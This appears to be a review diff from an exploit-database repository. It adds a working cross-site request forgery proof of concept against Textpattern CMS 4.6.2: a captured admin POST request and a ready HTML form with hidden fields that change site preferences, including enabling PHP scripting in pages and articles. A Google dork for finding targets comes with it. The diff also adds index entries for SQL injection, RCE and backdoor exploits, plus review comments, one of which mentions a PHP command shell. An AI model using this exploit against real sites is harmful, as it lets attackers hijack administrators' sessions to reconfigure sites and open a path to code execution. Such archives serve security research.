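warning, and `print(f"==> Uploading file: {self.file}")` prints the file object rather than the path. Finally, `xpl()` expects the uploaded PHP to accept `?cmd=` and wrap its output in `<pre>`, but the header never describes the payload file format; document it next to the `-f` option.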

@ -0,0 +1,137 @@
# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery
# Exploit Author: Alperen Ergel
# Contact: @alpren_ae
# Software Homepage: https://textpattern.com/
# Version : 4.6.2
# Tested on: windows 10 / xammp
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 2020-10-29
######## Description ########
#
# 1-) Loggin administrator page
#
# 2-) Go admin > prefs > site
#
# 3-) All inputs vulnerable to CSRF
#
#
######## Proof of Concept ########
========>>> REQUEST <<<=========
POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/textpattern/textpattern/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 1806
Connection: close
Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40
Upgrade-Insecure-Requests: 1
Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0&
is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7&
use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles&
file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=&
smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4&
title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1&
use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1&
include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0&
comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1&
comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=&
custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=&
step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720
### EXPLOIT ####
<html>
<!-- CSRF PoC -->
<body>
<form action="https://localhost/textpattern/textpattern/index.php" method="POST">
<input type="hidden" name="Submit" value="Save" />
<input type="hidden" name="sitename" value="CHANGEHERE" />
<input type="hidden" name="siteurl" value="CHANGEHERE" />
<input type="hidden" name="site&#95;slogan" value="CHANGEHERE" />
<input type="hidden" name="production&#95;status" value="testing" />
<input type="hidden" name="timezone&#95;key" value="Europe&#47;Berlin" />
<input type="hidden" name="auto&#95;dst" value="0" />
<input type="hidden" name="is&#95;dst" value="0" />
<input type="hidden" name="dateformat" value="since" />
<input type="hidden" name="archive&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" />
<input type="hidden" name="permlink&#95;mode" value="section&#95;id&#95;title" />
<input type="hidden" name="doctype" value="html5" />
<input type="hidden" name="logging" value="none" />
<input type="hidden" name="expire&#95;logs&#95;after" value="7" />
<input type="hidden" name="use&#95;comments" value="1" />
<input type="hidden" name="img&#95;dir" value="images" />
<input type="hidden" name="skin&#95;dir" value="themes" />
<input type="hidden" name="file&#95;base&#95;path" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;files" />
<input type="hidden" name="file&#95;max&#95;upload&#95;size" value="2000000" />
<input type="hidden" name="tempdir" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;textpattern&#47;tmp" />
<input type="hidden" name="plugin&#95;cache&#95;dir" value="" />
<input type="hidden" name="smtp&#95;from" value="" />
<input type="hidden" name="publisher&#95;email" value="" />
<input type="hidden" name="override&#95;emailcharset" value="0" />
<input type="hidden" name="enable&#95;xmlrpc&#95;server" value="0" />
<input type="hidden" name="default&#95;event" value="article" />
<input type="hidden" name="theme&#95;name" value="hive" />
<input type="hidden" name="module&#95;pophelp" value="1" />
<input type="hidden" name="default&#95;publish&#95;status" value="4" />
<input type="hidden" name="title&#95;no&#95;widow" value="0" />
<input type="hidden" name="articles&#95;use&#95;excerpts" value="1" />
<input type="hidden" name="allow&#95;form&#95;override" value="1" />
<input type="hidden" name="attach&#95;titles&#95;to&#95;permalinks" value="1" />
<input type="hidden" name="permlink&#95;format" value="1" />
<input type="hidden" name="send&#95;lastmod" value="1" />
<input type="hidden" name="publish&#95;expired&#95;articles" value="0" />
<input type="hidden" name="use&#95;textile" value="1" />
<input type="hidden" name="enable&#95;short&#95;tags" value="1" />
<input type="hidden" name="use&#95;plugins" value="1" />
<input type="hidden" name="admin&#95;side&#95;plugins" value="1" />
<input type="hidden" name="allow&#95;page&#95;php&#95;scripting" value="1" />
<input type="hidden" name="allow&#95;article&#95;php&#95;scripting" value="1" />
<input type="hidden" name="max&#95;url&#95;len" value="1000" />
<input type="hidden" name="syndicate&#95;body&#95;or&#95;excerpt" value="1" />
<input type="hidden" name="rss&#95;how&#95;many" value="5" />
<input type="hidden" name="show&#95;comment&#95;count&#95;in&#95;feed" value="1" />
<input type="hidden" name="include&#95;email&#95;atom" value="0" />
<input type="hidden" name="use&#95;mail&#95;on&#95;feeds&#95;id" value="0" />
<input type="hidden" name="comments&#95;on&#95;default" value="0" />
<input type="hidden" name="comments&#95;default&#95;invite" value="Comment" />
<input type="hidden" name="comments&#95;moderate" value="1" />
<input type="hidden" name="comments&#95;disabled&#95;after" value="42" />
<input type="hidden" name="comments&#95;auto&#95;append" value="0" />
<input type="hidden" name="comments&#95;mode" value="0" />
<input type="hidden" name="comments&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" />
<input type="hidden" name="comments&#95;sendmail" value="0" />
<input type="hidden" name="comments&#95;are&#95;ol" value="1" />
<input type="hidden" name="comment&#95;means&#95;site&#95;updated" value="1" />
<input type="hidden" name="comments&#95;require&#95;name" value="1" />
<input type="hidden" name="comments&#95;require&#95;email" value="1" />
<input type="hidden" name="never&#95;display&#95;email" value="1" />
<input type="hidden" name="comment&#95;nofollow" value="1" />
<input type="hidden" name="comments&#95;disallow&#95;images" value="0" />
<input type="hidden" name="comments&#95;use&#95;fat&#95;textile" value="0" />
<input type="hidden" name="spam&#95;blacklists" value="" />
<input type="hidden" name="custom&#95;1&#95;set" value="custom1" />
<input type="hidden" name="custom&#95;2&#95;set" value="custom2" />
<input type="hidden" name="custom&#95;3&#95;set" value="" />
<input type="hidden" name="custom&#95;4&#95;set" value="" />
<input type="hidden" name="custom&#95;5&#95;set" value="" />
<input type="hidden" name="custom&#95;6&#95;set" value="" />
<input type="hidden" name="custom&#95;7&#95;set" value="" />
<input type="hidden" name="custom&#95;8&#95;set" value="" />
<input type="hidden" name="custom&#95;9&#95;set" value="" />
<input type="hidden" name="custom&#95;10&#95;set" value="" />
<input type="hidden" name="step" value="prefs&#95;save" />
<input type="hidden" name="event" value="prefs" />
<input type="hidden" name="&#95;txp&#95;token" value="0342db47efb6882b488f6d367067d720" />
<input type="submit" value="Do Action" />
</form>
</body>
</html>


@ -40710,6 +40710,22 @@ id,file,description,date,author,type,platform,port
48889,exploits/php/webapps/48889.txt,"Seat Reservation System 1.0 - Unauthenticated SQL Injection",2020-10-16,"Rahul Ramkumar",webapps,php,
48890,exploits/php/webapps/48890.txt,"CS-Cart 1.3.3 - 'classes_dir' LFI",2020-10-16,0xmmnbassel,webapps,php,
48891,exploits/php/webapps/48891.txt,"CS-Cart 1.3.3 - authenticated RCE",2020-10-16,0xmmnbassel,webapps,php,
48892,exploits/php/webapps/48892.txt,"Tourism Management System 1.0 - Arbitrary File Upload",2020-10-19,"Ankita Pal",webapps,php,
48893,exploits/php/webapps/48893.txt,"Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting",2020-10-19,"Matthew Aberegg",webapps,php,
48894,exploits/php/webapps/48894.txt,"Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection",2020-10-19,"Matthew Aberegg",webapps,php,
48895,exploits/php/webapps/48895.txt,"Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection",2020-10-19,"Matthew Aberegg",webapps,php,
48896,exploits/php/webapps/48896.txt,"Online Student's Management System 1.0 - Remote Code Execution (Authenticated)",2020-10-19,"Akıner Kısa",webapps,php,
48897,exploits/php/webapps/48897.txt,"Online Discussion Forum Site 1.0 - XSS in Messaging System",2020-10-19,j5oh,webapps,php,
48898,exploits/php/webapps/48898.txt,"Online Job Portal 1.0 - Cross Site Scripting (Stored)",2020-10-19,"Akıner Kısa",webapps,php,
48899,exploits/hardware/webapps/48899.sh,"HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal",2020-10-19,"Alexei Kojenov",webapps,hardware,
48900,exploits/hardware/webapps/48900.sh,"HiSilicon Video Encoders - RCE via unauthenticated command injection",2020-10-19,"Alexei Kojenov",webapps,hardware,
48901,exploits/hardware/webapps/48901.sh,"HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware",2020-10-19,"Alexei Kojenov",webapps,hardware,
48902,exploits/hardware/webapps/48902.sh,"HiSilicon Video Encoders - Full admin access via backdoor password",2020-10-19,"Alexei Kojenov",webapps,hardware,
48903,exploits/hardware/webapps/48903.sh,"HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)",2020-10-19,"Alexei Kojenov",webapps,hardware,
48904,exploits/java/webapps/48904.txt,"Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in",2020-10-19,"Daniel Morris",webapps,java,
48905,exploits/php/webapps/48905.txt,"Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)",2020-10-19,Kokn3t,webapps,php,
48906,exploits/php/webapps/48906.py,"Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)",2020-10-19,"Rodolfo Tavares",webapps,php,
48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
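Review bot: the description casing in the new rows is inconsistent; 48901 reads "HiSilicon video encoders" while 48899, 48900, 48902 and 48903 use "HiSilicon Video Encoders", and 48898 and 48905 use "Cross Site Scripting" where 48893 uses "Cross-Site Scripting". Suggest normalizing to "HiSilicon Video Encoders" and "Cross-Site Scripting" in this hunk so that a search over the description column returns all of the related entries together.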